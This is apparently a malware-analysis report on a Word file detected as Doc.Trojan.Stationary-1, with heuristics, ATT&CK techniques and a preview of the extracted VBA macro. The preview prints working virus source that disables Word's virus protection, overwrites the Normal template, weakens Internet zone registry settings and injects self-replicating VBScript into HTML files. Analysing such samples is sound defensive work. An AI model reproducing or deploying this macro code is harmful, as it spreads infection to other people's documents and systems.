MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that attempt to infect HTML files and modify registry settings. The macro code includes calls to `CreateObject` and `GetObject`, indicative of malicious activity. The script also attempts to write to registry keys related to 'Stationery' and Internet settings, suggesting an attempt to establish persistence or modify system behavior. The ClamAV detection of 'Doc.Trojan.Stationary-1' further supports the malicious nature of the file.
Heuristics 4
-
ClamAV: Doc.Trojan.Stationary-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Stationary-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22877 bytes |
SHA-256: 912b399dc2c047a0fa40c074ad8798d348fadc043f5eb9df35c0efb435047c2e |
|||
|
Detection
ClamAV:
Doc.Trojan.Stationary-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Stationery
'v1.2, Residency :)
'by CyberShadow//SMF
Private Sub Document_Close()
With Application
.EnableCancelKey = False
.ScreenUpdating = False
.ShowVisualBasicEditor = False
End With
With Options
.ConfirmConversions = False
.SaveNormalPrompt = False
.VirusProtection = False
End With
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'Stationery" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
If AD.Lines(1, 1) <> "'Stationery" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
CrStr = getname()
Call compile(CryptedString, CrStr)
Call CorrectLine(CryptedString, CrStr)
a = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery", "Stationery Folder") + "\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
Call infectHTML(a, CryptedString, CrStr)
End Sub
Private Sub infectHTML(a, CryptedString, CrStr)
With Application.FileSearch
.FileName = "*.htm"
.MatchAllWordForms = True
.LookIn = a
.SearchSubFolders = True
.Execute
For i = 1 To .FoundFiles.Count
c = .FoundFiles(i)
Open c For Input As 1
If LOF(1) > 55000 Then GoTo ExitRead
e = ""
Do While Not EOF(1)
Line Input #1, a2
d = a2
If Len(d) >= 3 Then
b = UCase(d)
If b = "<HTML> <CYBERSHADOW...>" Then GoTo ExitRead
If b = "<HTML>" Then b = "<html> <CyberShadow...>": d = b
For j = 1 To Len(b) - 6
If Mid$(b, j, 8) = "</BODY>" Then
d = Left$(b, j + 7) + Chr$(13) + Chr$(10)
d = d + "<body>" + Chr$(13) + Chr$(10)
d = d + "<script language=""VBScript"">" + Chr$(13) + Chr$(10)
d = d + "<!--" + Chr$(13) + Chr$(10)
d = d + "On Error Resume Next" + Chr$(13) + Chr$(10)
d = d + CryptedString + Chr$(13) + Chr$(10)
d = d + "Dim FSO" + Chr$(13) + Chr$(10)
d = d + "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + Chr$(13) + Chr$(10)
d = d + "Set WordObj = GetObject("""", ""Word.Application""): Quit = 0" + Chr$(13) + Chr$(10)
d = d + "If WordObj = """" Then" + Chr$(13) + Chr$(10)
d = d + "Set WordObj = CreateObject(""Word.Application""): Quit = 1" + Chr$(13) + Chr$(10)
d = d + "End If" + Chr$(13) + Chr$(10)
d = d + "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule" + Chr$(13) + Chr$(10)
d = d + "If NT.Lines(1, 1) <> ""'Stationery"" Then" + Chr$(13) + Chr$(10)
d = d + "WordObj.Options.SaveNormalPrompt = False" + Chr$(13) + Chr$(10)
d = d + "NT.DeleteLines 1, NT.CountOfLines" + Chr$(13) + Chr$(10)
d = d + "NT.InsertLines 1," + CrStr + Chr$(13) + Chr$(10)
d = d + "End If" + Chr$(13) + Chr$(10)
d = d + "Set NT = Nothing" + Chr$(13) + Chr$(10)
d = d + "If Quit = 1 Then WordObj.Quit" + Chr$(13) + Chr$(10)
d = d + "--></script>" + Chr$(13) + Chr$(10)
d = d + "</body>" + Chr$(13) + Chr$(10)
j = j + 7
If (Len(b) - j - 7) > 0 Then d = d + Right$(b, Len(b) - j - 7)
End If
Next
End If
e = e + d + Chr$(13) + Chr$(10)
Loop
Close #1
Open c For Output As 1
Print #1, e
identities = System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities", "Default User ID")
System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\" + identities + "\Software\Microsoft\Outlook Expres
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.